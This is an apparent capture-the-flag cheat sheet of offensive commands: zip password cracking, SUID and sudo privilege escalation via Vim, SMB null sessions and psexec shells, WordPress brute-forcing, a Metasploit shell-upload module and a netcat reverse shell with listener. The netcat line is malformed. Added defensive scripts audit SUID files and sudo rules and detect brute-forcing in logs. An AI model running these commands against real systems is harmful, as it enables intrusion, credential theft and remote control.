1. Crack the Password of a Zip Archive

zip2john backup.zip > passwd.txt
john passwd.txt

2. Find

  1. Find files with the SUID bit set
find / -perm -u=s 2>/dev/null

If one turns up, check GTFOBins to see whether that binary can be used for privilege escalation.

  2. Find files owned by a particular group
find / -type f -group bugtracker 2>/dev/null

  3. Find a file by name
# linux
find / -name "user.txt" 2>/dev/null
# powershell
Get-ChildItem -Recurse -Filter user.txt
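The SUID search above is just as useful from the defending side: the same find(1) call, recorded once on a known-good host, gives a baseline against which every later run can be diffed, so a newly set SUID bit becomes a finding. The script below is an added example and is not part of the original notes; it assumes POSIX sh, find(1) and awk(1), and the baseline format (one absolute path per line) is an assumption of this example.

```shell
#!/bin/sh
# Added example (not from the original notes): audit the SUID binaries under a
# directory tree against a baseline recorded on a known-good host, so that a
# newly set SUID bit shows up as a finding. Assumes POSIX sh, find(1) and awk(1);
# the baseline file format (one absolute path per line) is an assumption.

# list_suid DIR: print every regular file under DIR with the SUID bit (mode 4000) set.
# -perm -4000 is the portable spelling of the -perm -u=s used in the notes.
list_suid() {
    find "$1" -type f -perm -4000 2>/dev/null | sort
}

# count_suid DIR: number of SUID files under DIR (a per-host metric worth trending).
count_suid() {
    list_suid "$1" | awk 'END { print NR }'
}

# new_suid DIR BASELINE: SUID files under DIR that are not listed in BASELINE.
# A missing or empty baseline reports every SUID file, which is the safe default.
new_suid() {
    list_suid "$1" | awk -v base="$2" '
        BEGIN {
            if (base != "")
                while ((getline line < base) > 0) known[line] = 1
        }
        !($0 in known) { print }
    '
}

# Typical use on a host: record once, then compare on every run.
#   list_suid / > /var/lib/suid-baseline.txt   # on the known-good host
#   new_suid / /var/lib/suid-baseline.txt       # later; any output is a finding
```

Anything printed by new_suid is either a legitimate package update (add it to the baseline after review) or a persistence mechanism of exactly the kind the GTFOBins check above is looking for.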

3. SMB

If port 445 is open on the target, list the shares that are reachable without credentials (null session):

smbclient -N -L //<target-ip>

then connect to a share and download files from it:

smbclient //<target-ip>/backup
get filename

Once a username and password are known, get a shell with Impacket's psexec.py:

python3 psexec.py administrator@<target-ip>

4. Upgrade Shell to tty

SHELL=/bin/bash script -q /dev/null
# or
python3 -c "import pty;pty.spawn('/bin/bash')"

5. Sudo

List the commands the current user is allowed to run with sudo:

sudo -l

If one of the allowed commands can launch a subprocess, it can be used to open a new shell that runs as root.

For example, :!/bin/bash from inside Vim.
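The sudo -l output is also what an administrator should review, since every rule that grants an editor, a shell, or ALL is the privilege-escalation path described above. The script below is an added example, not part of the original notes: it parses sudo -l output from stdin and prints the rules that need review. The sample output, the host name and user name, and the short watchlist of programs are all constructed for this example; it assumes POSIX sh and awk(1).

```shell
#!/bin/sh
# Added example (not from the original notes): flag sudo rules that deserve review.
# Reads the text produced by `sudo -l` on stdin. Assumes POSIX sh and awk(1).

# audit_sudo_rules: print one "REVIEW: <command> (<reason>)" line per risky rule.
audit_sudo_rules() {
    awk '
        # Rule lines start with a parenthesised run-as spec such as "(ALL)" or "(root : root)".
        /^[ \t]*\(/ {
            rule = $0
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", rule)          # drop the run-as spec
            nopass = 0
            if (rule ~ /^NOPASSWD:/) {
                nopass = 1
                sub(/^NOPASSWD:[ \t]*/, "", rule)
            }
            cmd = rule
            sub(/[ \t].*$/, "", cmd)                        # first token is the command path
            n = split(cmd, parts, "/")
            base = parts[n]                                  # basename of the command
            reason = ""
            if (cmd == "ALL")
                reason = "any command"
            else if (base ~ /^(vim|vi|bash|sh)$/)            # constructed watchlist for this example
                reason = "interactive program that can spawn a shell"
            if (nopass) {
                if (reason != "") reason = reason "; "
                reason = reason "NOPASSWD"
            }
            if (reason != "") print "REVIEW: " cmd " (" reason ")"
        }
    '
}

# sample_sudo_output: constructed `sudo -l` text used to exercise the audit offline.
sample_sudo_output() {
    cat <<'EOF'
Matching Defaults entries for alice on web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

User alice may run the following commands on web01:
    (ALL) NOPASSWD: /usr/bin/vim
    (root) /usr/bin/systemctl restart nginx
    (ALL : ALL) ALL
EOF
}

# On a real host: sudo -l | audit_sudo_rules
```

For the constructed sample, the vim rule and the ALL rule are reported while the systemctl rule is not; the fix for the first two is to replace the editor with sudoedit and to scope the ALL rule to the specific commands the role needs.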

6. Website

Brute-force directories and files:

gobuster dir -u http://<target> -w /usr/share/wordlists/dirb/big.txt

Scan the web server for known issues:

nikto -host http://<target> -o _28.html

For WordPress, enumerate users and then brute-force their passwords:

wpscan --url http://<target> --enumerate
wpscan --url http://<target> -U users.txt -P backupPasswords
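Both gobuster and the wpscan password run above leave a distinctive trail in the web server's access log: one source producing a burst of 404s, or a burst of POSTs to the login page. The script below is an added example, not part of the original notes or of either tool: it reads combined-format access log lines from stdin and flags sources that exceed a threshold. The log lines, the TEST-NET addresses and the user-agent strings are constructed for this example; it assumes POSIX sh, awk(1) and the Apache/nginx combined log format (status code in field 9).

```shell
#!/bin/sh
# Added example (not from the original notes): detect directory and login
# brute-forcing in combined-format access logs. Assumes POSIX sh and awk(1).

# flag_scanners THRESHOLD: read access log lines on stdin and print
# "IP  reason  hits/total" for each source at or above THRESHOLD.
flag_scanners() {
    awk -v thr="$1" '
        {
            ip = $1; method = $6; path = $7; status = $9
            sub(/^"/, "", method)               # strip the opening quote of "GET /path HTTP/1.1"
            total[ip]++
            if (status == "404") notfound[ip]++
            if (method == "POST" && path == "/wp-login.php") logins[ip]++
        }
        END {
            for (ip in total) {
                if (notfound[ip] >= thr) print ip, "dir-bruteforce", notfound[ip] "/" total[ip]
                if (logins[ip]   >= thr) print ip, "login-bruteforce", logins[ip] "/" total[ip]
            }
        }
    ' | sort
}

# sample_access_log: constructed log lines (TEST-NET addresses) used to exercise
# the detector offline: one directory scanner, one normal visitor, one login brute force.
sample_access_log() {
    cat <<'EOF'
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /admin HTTP/1.1" 404 153 "-" "gobuster/3.1"
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /backup HTTP/1.1" 404 153 "-" "gobuster/3.1"
203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /config HTTP/1.1" 404 153 "-" "gobuster/3.1"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /dev HTTP/1.1" 404 153 "-" "gobuster/3.1"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /old HTTP/1.1" 404 153 "-" "gobuster/3.1"
203.0.113.7 - - [10/Oct/2023:13:55:37 +0000] "GET /wp-admin HTTP/1.1" 301 0 "-" "gobuster/3.1"
198.51.100.4 - - [10/Oct/2023:13:56:01 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:56:02 +0000] "GET /favicon.ico HTTP/1.1" 404 153 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:57:10 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "WPScan v3.8"
203.0.113.9 - - [10/Oct/2023:13:57:10 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "WPScan v3.8"
203.0.113.9 - - [10/Oct/2023:13:57:11 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "WPScan v3.8"
203.0.113.9 - - [10/Oct/2023:13:57:11 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "WPScan v3.8"
203.0.113.9 - - [10/Oct/2023:13:57:12 +0000] "POST /wp-login.php HTTP/1.1" 200 3100 "-" "WPScan v3.8"
EOF
}

# On a real host: flag_scanners 50 < /var/log/nginx/access.log
```

The threshold is per log file rather than per time window; on a busy server, feed the detector one rotated log or a time-sliced extract so that a day's worth of ordinary 404s from a single proxy does not trip it.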

With valid admin credentials, the matching Metasploit module:

use exploit/unix/webapp/wp_admin_shell_upload

Netcat on the Windows side (the listener address is omitted in these notes):

nc.exe -a "-e cmd.exe 7777"

Listener on the attacking machine:

nc -lvnp 4444

Dump Cached Passwords